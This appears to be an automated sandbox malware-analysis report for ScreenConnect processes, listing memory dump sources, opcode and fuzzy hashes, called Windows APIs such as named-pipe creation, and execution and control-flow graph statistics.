                                                                      • Instruction ID: 9b7e86cb1d40e27f212f326b01989e5a1d2510c207b17bafafc9237555ca9609
                                                                      • Opcode Fuzzy Hash: 772f8d3c864dc2e87b241902efd51d0e131e0d7603e9982bf996e69d4907c694
                                                                      • Instruction Fuzzy Hash: E80169A140D3809FE7134A258894752BFA8EF53224F0984DBE9888F2A3C2695845C772
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2956546852.000000000104D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0104D000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_104d000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12b12205acd535776edc1cbc2d2c8217f104092cb7fbc6f5ff0ad387092fe122
                                                                      • Instruction ID: da5cfab51ef5711bb63fee568a50af82e8c2e6c2dbb76bf150ccbace7581a9fd
                                                                      • Opcode Fuzzy Hash: 12b12205acd535776edc1cbc2d2c8217f104092cb7fbc6f5ff0ad387092fe122
                                                                      • Instruction Fuzzy Hash: 050126B11083009BE7118A69CDC4B6BBFD8EF513A4F08C57AFD894B286C279D842C7B1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 792bfe02a5a9f073f8b6163b1512adb031efba4d932568efe2c83d60b1dd6810
                                                                      • Instruction ID: 426a569dc2d897ec3cfd2e1077984ca02bd77d36c926bb00a9c167a733e918f2
                                                                      • Opcode Fuzzy Hash: 792bfe02a5a9f073f8b6163b1512adb031efba4d932568efe2c83d60b1dd6810
                                                                      • Instruction Fuzzy Hash: 24014EB1B483006FD315972AE854A5ABFE5DB81250B05457BD649DB350DF74EC0A87D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 00c2df74277a434eee67bd31124b17c5075f72bf476bc612cfbca2ff84ce2808
                                                                      • Instruction ID: 38887b4ee678518e0f77e35b2a8e3c8f456f9f79778203893b5af9b75e7b7503
                                                                      • Opcode Fuzzy Hash: 00c2df74277a434eee67bd31124b17c5075f72bf476bc612cfbca2ff84ce2808
                                                                      • Instruction Fuzzy Hash: 14016276B0010A9FCF14DBA9D8009EEBBB5EF94265B00847BD959E3204E630A9258B91
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a7b0a4d93249bea9a0af5947b2c6be4070c6919350a5671a976c1d97344ca7b3
                                                                      • Instruction ID: fd4f223852c504546bee81bca5dad68ae9f0cc2c9e440b1cfc42a53372be1429
                                                                      • Opcode Fuzzy Hash: a7b0a4d93249bea9a0af5947b2c6be4070c6919350a5671a976c1d97344ca7b3
                                                                      • Instruction Fuzzy Hash: 91F0F6B6B043004FD319DB39E86009DBBA6EE91254309C5BAD009DF366EE31D8068B90
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f9a183bb07f7058d2b3babe7bacfe6e28a446b6e2eb58410c2188a8a4568fd2c
                                                                      • Instruction ID: 3acf2e2846756f341ca2b0aae0f6e0ee7a648227ffde85483a9aa3fa8038ba3c
                                                                      • Opcode Fuzzy Hash: f9a183bb07f7058d2b3babe7bacfe6e28a446b6e2eb58410c2188a8a4568fd2c
                                                                      • Instruction Fuzzy Hash: 27F0B432700219AFEF059F94A8409EE3B7BFB88214B008029F619E7250DA72992297A1
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e33415e3d31a75a8f75b89b1c8c2d3728895a6e260cc5055555cafccba7dba0
                                                                      • Instruction ID: 5bc9532acfd79523aaa0a63736ea7653563503824ec3bfb6fcadfa1742367494
                                                                      • Opcode Fuzzy Hash: 5e33415e3d31a75a8f75b89b1c8c2d3728895a6e260cc5055555cafccba7dba0
                                                                      • Instruction Fuzzy Hash: 430162B1D00219DFCB44DFA9C8405DEFBF0EF46210B108665D528EB250E331AA13DF80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: fea94b1ffa5705ff368a99e91f4352a3b3b2b92228840924060cb77d3bb8bc40
                                                                      • Instruction ID: ab65217f42d3cb12e45dbd52cc1b56c63f64f828ab19673aa211b6f81bb4b47b
                                                                      • Opcode Fuzzy Hash: fea94b1ffa5705ff368a99e91f4352a3b3b2b92228840924060cb77d3bb8bc40
                                                                      • Instruction Fuzzy Hash: 54F0C23084834BAFDF01AF64D4157AABFB0EB41301F104C65C501AB256DB78556ACB82
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8ceefe715259739fcdb9e9cc14b22a6cf2df6269898e1f6be51e5b43133cd866
                                                                      • Instruction ID: 739dec3da870078969b51a1bf8ca99ac2476cd2a6c71b61559209fe812994fc3
                                                                      • Opcode Fuzzy Hash: 8ceefe715259739fcdb9e9cc14b22a6cf2df6269898e1f6be51e5b43133cd866
                                                                      • Instruction Fuzzy Hash: 12F0597B6042185F8344DE5AD40085EBFA6DFC5220708C057F818E7311D539E912C760
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7ead50bdeee3dd87ed9d10aa516ba2c8f631dc180bb0589c1845e3bf9f8c6122
                                                                      • Instruction ID: cdad7d7200c6fc49a997fac650d0ba1771cbf379549217ab029d88b85cbea515
                                                                      • Opcode Fuzzy Hash: 7ead50bdeee3dd87ed9d10aa516ba2c8f631dc180bb0589c1845e3bf9f8c6122
                                                                      • Instruction Fuzzy Hash: 29F0B4707403015BA2109A5BE85095BB7CADB845503008539E5499B304DE70F81547D0
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb8377306a2edd7ea259f28527ef00d6983d1984eeee4f22cfd901bb2b48686e
                                                                      • Instruction ID: eb6edebbccb0743bf24cbd76944631bc06d19bae42733b667507f6e2e5608b81
                                                                      • Opcode Fuzzy Hash: eb8377306a2edd7ea259f28527ef00d6983d1984eeee4f22cfd901bb2b48686e
                                                                      • Instruction Fuzzy Hash: 76F0E26038A6804FDB05D738C85088E3FB2DE8725438A44BAC18ECB2A3E9188C0B8751
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 59c84bbd4ea4d29608e65014614efe584bb71e176f73a1a54aafd44362e8afc8
                                                                      • Instruction ID: 30047b8bd737e5ada96d46a1edd58cab132e4519189f93929e3007ee3b5b10e0
                                                                      • Opcode Fuzzy Hash: 59c84bbd4ea4d29608e65014614efe584bb71e176f73a1a54aafd44362e8afc8
                                                                      • Instruction Fuzzy Hash: 4DF06D70D8420ADFDF00DF69E918B6EBBF4FB44315F004865D600A7254DB78A5699B82
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d8eeb5c29714b1dc56298fdacfb72064ba18cf3a58b9e1b5942c06f6e9bc7432
                                                                      • Instruction ID: cf03f8f6cbcb4fbb6a6e4eff84e5750d505fc98567b6c8f71bc0a71865672c25
                                                                      • Opcode Fuzzy Hash: d8eeb5c29714b1dc56298fdacfb72064ba18cf3a58b9e1b5942c06f6e9bc7432
                                                                      • Instruction Fuzzy Hash: 42F09A31700124CFC718DF29D404AAEB7E1EF88310B0480A4E805DB368EA34ED10CB80
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7c12ba2fadbabe89535e9bb86ebe7baceece9e975beaa57c6d302faa7311b68
                                                                      • Instruction ID: 16400a57e9c515218280c8df2ed09a4bc7c3008303b1bf9bd1d2fc302023934d
                                                                      • Opcode Fuzzy Hash: c7c12ba2fadbabe89535e9bb86ebe7baceece9e975beaa57c6d302faa7311b68
                                                                      • Instruction Fuzzy Hash: 8BE0A0367002186F47449A8AD400D6FBBEADBC8220718C016F908D7300D975E9128B60
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2988970016.00000000040E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 040E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_40e0000_ScreenConnect.jbxd
                                                                      APIs
                                                                      • RtlGetVersion.NTDLL(0000009C), ref: 013F4DBE
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2961097757.00000000013F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 013F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_13f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: Version
                                                                      • String ID: `Q^q
                                                                      • API String ID: 1889659487-1948671464

                                                                      Execution Graph

                                                                      Execution Coverage:12.7%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:0%
                                                                      Total number of Nodes:5
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 13199 7ffd9b3e8014 13201 7ffd9b3e801d 13199->13201 13200 7ffd9b3e8082 13201->13200 13202 7ffd9b3e80f6 SetProcessMitigationPolicy 13201->13202 13203 7ffd9b3e8152 13202->13203

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 1aefdf2c3aea5dcae059924b4234fabdf65201dc30f2a7e6e20ea2454943fc98
                                                                      • Instruction ID: 5c657faf755f56d30c80a44237090e46042d011f1420b77c16032f124fd08555
                                                                      • Opcode Fuzzy Hash: 1aefdf2c3aea5dcae059924b4234fabdf65201dc30f2a7e6e20ea2454943fc98
                                                                      • Instruction Fuzzy Hash: F0320932B1EA4E4BE7B5E7A884756B97BD2EF94300F16407AD06DCB1E3DD28B9058341

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: a409bcb8f8fa0d12b577b328d61c418f7eddba381e4281b9b3711b411e8e068c
                                                                      • Instruction ID: 42d2d7ed879298577be9c7aafd965b192b2181006a0bb7587b4dcf980e6aae0f
                                                                      • Opcode Fuzzy Hash: a409bcb8f8fa0d12b577b328d61c418f7eddba381e4281b9b3711b411e8e068c
                                                                      • Instruction Fuzzy Hash: 96921636B0EA4A4FEBA9EF6C84B16A03BE1FF55700B1501BAD069CF1A7DD15F9428740

                                                                      Control-flow Graph

                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 61602f6edb724c46b90135ba076dd6f1b96f9f88e30feed250089add06530703
                                                                      • Instruction ID: ca49f8b5c4c94c32375ed92d3c8dbc1774fecda0d00ca5c63c563b95aa98ef74
                                                                      • Opcode Fuzzy Hash: 61602f6edb724c46b90135ba076dd6f1b96f9f88e30feed250089add06530703
                                                                      • Instruction Fuzzy Hash: D3125772B1EA4E0BE7789A6884756B43FD2EF95300F5A01B9D46DCB1E7DD28BD028341
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7a8f9922303b68b4679b138e8d9973ae2900a41408f82d296db8d0d9d1975e48
                                                                      • Instruction ID: db7f8fafcedf46f4ecd2be0e838f348f8b56d4585dfa9a572a9ae66240a6e655
                                                                      • Opcode Fuzzy Hash: 7a8f9922303b68b4679b138e8d9973ae2900a41408f82d296db8d0d9d1975e48
                                                                      • Instruction Fuzzy Hash: F402D271B1DA4E4FEBA8EB6884A5AB97BD1FFA4300F01417DD05EC72A6DE24B841C741

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.2989971386.00007FFD9B3E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3E0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b3e0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: fcbee0422acdb3d2fa4a57a8ff34da5d3c4ed55a5fee52d7146b73f984fee195
                                                                      • Instruction ID: 16a0c5ac2d379e67500e2a6dc6261fe4c645d1d204524631932a4c48010f847e
                                                                      • Opcode Fuzzy Hash: fcbee0422acdb3d2fa4a57a8ff34da5d3c4ed55a5fee52d7146b73f984fee195
                                                                      • Instruction Fuzzy Hash: 4B512831D0DB494FDB29EFA8984A5E97BE0EF55310F04027FE089C3292DA78B9468791

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1
                                                                      • API String ID: 0-736386057
                                                                      • Opcode ID: 18c24aa6cef24528a8092e351517174f1373927f0189ff105fa1598a66ca3e37
                                                                      • Instruction ID: 29076ce093e719e0b3634e953e3a7993ec84976ea130d043523ad14efcea6cb9
                                                                      • Opcode Fuzzy Hash: 18c24aa6cef24528a8092e351517174f1373927f0189ff105fa1598a66ca3e37
                                                                      • Instruction Fuzzy Hash: 2C9149B271DA4D4FDB98DF6888A1AA537D2FFA4350B4401BDE46DCB197DE25F8028B40

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: H
                                                                      • API String ID: 0-2852464175
                                                                      • Opcode ID: 90ed5532b428100558c0f22d51a8b3146210e3fabae9211af2d5e6a5d0d00b69
                                                                      • Instruction ID: 78ec6fcc2ee1efab31e5c85791762f2c75b9034edc46d36357a9428001188a3a
                                                                      • Opcode Fuzzy Hash: 90ed5532b428100558c0f22d51a8b3146210e3fabae9211af2d5e6a5d0d00b69
                                                                      • Instruction Fuzzy Hash: BE71AA71F1A90F4BF775EAA480716BD7AD2EF94344F56403DD42ECA1E2DD397A068240

                                                                      Control-flow Graph

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: l
                                                                      • API String ID: 0-2517025534
                                                                      • Opcode ID: 9fded1588d2673bf189a763482ed9a3a176e9db72be38cae0ebe6e7449382248
                                                                      • Instruction ID: 5d54c3c64bc4c5b903075e6210ea3f1a62dda2f6407d75b1d1bb4b7dc4bd2f47
                                                                      • Opcode Fuzzy Hash: 9fded1588d2673bf189a763482ed9a3a176e9db72be38cae0ebe6e7449382248
                                                                      • Instruction Fuzzy Hash: 70213623E1FA8D0FD7159B7848759B97FA0FF81200B0542AAD068DB5E3DD086A098340
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 31580f69df7ce9fbeb8f2b9e3f1c7a9dec8a512a83ea1d8314b3aa4d1559ca14
                                                                      • Instruction ID: 6b6a2425d3ba47c6f53a9721635651d228ad72273b442a3156aba8de24da9788
                                                                      • Opcode Fuzzy Hash: 31580f69df7ce9fbeb8f2b9e3f1c7a9dec8a512a83ea1d8314b3aa4d1559ca14
                                                                      • Instruction Fuzzy Hash: 08C16B33B0FA4E0BEB68EA688462CB57BD1EF51350B05027DD46D8B5D7ED15FA0A8381
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      • Opcode Fuzzy Hash: 9f2a237f226a73cfc1fbd838c3acb3459f639732612d8162f41b34cb0558dd9d
                                                                      • Instruction Fuzzy Hash: 4CE0DF2160F3D54FDB539B3888A88E13FA0EE1322030981EFD485CF0B3E5189A89C782
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 5e806ee69a04d3c3e8ba93037018dbb46b8dd2c437de0817ac692741bba6f126
                                                                      • Instruction ID: 496d9d6992a8731276c9523ff28790e87be4801cbea4abae3c7d91f48fb1dc5a
                                                                      • Opcode Fuzzy Hash: 5e806ee69a04d3c3e8ba93037018dbb46b8dd2c437de0817ac692741bba6f126
                                                                      • Instruction Fuzzy Hash: 47E08C16B4EA1B02FB7C61E678A13B564D19F04391F0A407EA42DC48E9DC9CAE808592
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 8496e21985241a21aa1773cb843b13a606cdd80df643472c48351b373c9c9ce3
                                                                      • Instruction ID: 41c8f01b48759f1482c06148ffee133965836c3c82aba9d63d0f6e235927cb63
                                                                      • Opcode Fuzzy Hash: 8496e21985241a21aa1773cb843b13a606cdd80df643472c48351b373c9c9ce3
                                                                      • Instruction Fuzzy Hash: 2DD01212F1E96D0AD5A5626C38612E941D5DB9815174911F3E42CC629EEC085D8143D1
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 454232dcf8058cccb96898cebe9898c5d0872939ceade0badd0c7025267d384e
                                                                      • Instruction ID: 5bc6f8ba8e9cb8d17163a85b301a31d3d4a3be073e6d3e43b98605a8be84e173
                                                                      • Opcode Fuzzy Hash: 454232dcf8058cccb96898cebe9898c5d0872939ceade0badd0c7025267d384e
                                                                      • Instruction Fuzzy Hash: 83C09B10F1A54E57F564FBA4447117D11527F89200B93843EF01D851A6CD3C77115945
                                                                      Memory Dump Source
                                                                      • Source File: 00000008.00000002.3003047013.00007FFD9B6F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B6F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_8_2_7ffd9b6f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3fbafd006442ebdadfd2c062062598a7a7aaf40fd7338f1571b4347fbe383d38
                                                                      • Instruction ID: 2694424e300b1362f541984a53640f7c6392bd801cdab2c6ea3de9c0b4d29909
                                                                      • Opcode Fuzzy Hash: 3fbafd006442ebdadfd2c062062598a7a7aaf40fd7338f1571b4347fbe383d38
                                                                      • Instruction Fuzzy Hash: BCA00200F1F91E96E471B5D4002117D04411F55610B62817AE05D851B6CE1D7B521996

                                                                      Execution Graph

                                                                      Execution Coverage:13.1%
                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                      Signature Coverage:18.8%
                                                                      Total number of Nodes:16
                                                                      Total number of Limit Nodes:1
                                                                      execution_graph 16075 7ffd9b708fb4 16079 7ffd9b708fb7 16075->16079 16076 7ffd9b709159 GlobalMemoryStatusEx 16078 7ffd9b709185 16076->16078 16077 7ffd9b7090b2 16079->16076 16079->16077 16080 7ffd9b3f8014 16082 7ffd9b3f801d 16080->16082 16081 7ffd9b3f8082 16082->16081 16083 7ffd9b3f80f6 SetProcessMitigationPolicy 16082->16083 16084 7ffd9b3f8152 16083->16084 16067 7ffd9b3f3662 16068 7ffd9b4161f0 ConnectNamedPipe 16067->16068 16070 7ffd9b4162a2 16068->16070 16071 7ffd9b3f3642 16072 7ffd9b416050 CreateNamedPipeW 16071->16072 16074 7ffd9b416183 16072->16074

                                                                      Control-flow Graph

                                                                      control_flow_graph 285 7ffd9b3f3642-7ffd9b4160ba 288 7ffd9b4160c4-7ffd9b416181 CreateNamedPipeW 285->288 289 7ffd9b4160bc-7ffd9b4160c1 285->289 291 7ffd9b416183 288->291 292 7ffd9b416189-7ffd9b4161bc 288->292 289->288 291->292
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1813561393.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: CreateNamedPipe
                                                                      • String ID:
                                                                      • API String ID: 2489174969-0
                                                                      • Opcode ID: 99008a3d405c1c4144be27c6e46fe3a27932dfaa7a86662261a5ffee048cb71e
                                                                      • Instruction ID: b90edd816ab630c1b079a9d8c523b5746d5c13c40bdf6d48ae23e7ab11c63fd9
                                                                      • Opcode Fuzzy Hash: 99008a3d405c1c4144be27c6e46fe3a27932dfaa7a86662261a5ffee048cb71e
                                                                      • Instruction Fuzzy Hash: 7951A07191CA1C8FDB68EF5C9805BE9BBE0FB59710F1042AEE44ED3251CB70A9418BC1

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1818503332.00007FFD9B700000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B700000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b700000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: GlobalMemoryStatus
                                                                      • String ID:
                                                                      • API String ID: 1890195054-0
                                                                      • Opcode ID: 1036d0225a7f3bcf86496957733011091d7f68cb6dba76c7adf58f95396542c3
                                                                      • Instruction ID: 4af764073f8bba12fe9ff3ff8b93bec9632abe47849f3d4d12001da28bd76965
                                                                      • Opcode Fuzzy Hash: 1036d0225a7f3bcf86496957733011091d7f68cb6dba76c7adf58f95396542c3
                                                                      • Instruction Fuzzy Hash: AE811931A0E78E4FE775D7A888296B87FE0EF52320F0542BBD09DC75B3DA54650A8341

                                                                      Control-flow Graph

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000009.00000002.1813561393.00007FFD9B3F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B3F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_9_2_7ffd9b3f0000_ScreenConnect.jbxd
                                                                      Similarity
                                                                      • API ID: MitigationPolicyProcess
                                                                      • String ID:
                                                                      • API String ID: 1088084561-0
                                                                      • Opcode ID: 32c6a6dab82705be07b0ef68f969eda328337d89dec535e44f48862f731e8ee3
                                                                      • Instruction ID: 9269778f4e515868a7a41c4c20f4b48c93eb5a1ae5d69f695a311a955f1da570
                                                                      • Opcode Fuzzy Hash: 32c6a6dab82705be07b0ef68f969eda328337d89dec535e44f48862f731e8ee3
                                                                      • Instruction Fuzzy Hash: 5D512B31E0DB494FEB29EFA8984A5E97BE0EF55310F04027EE059C3192DF78A5458791

                                                                      Control-flow Graph

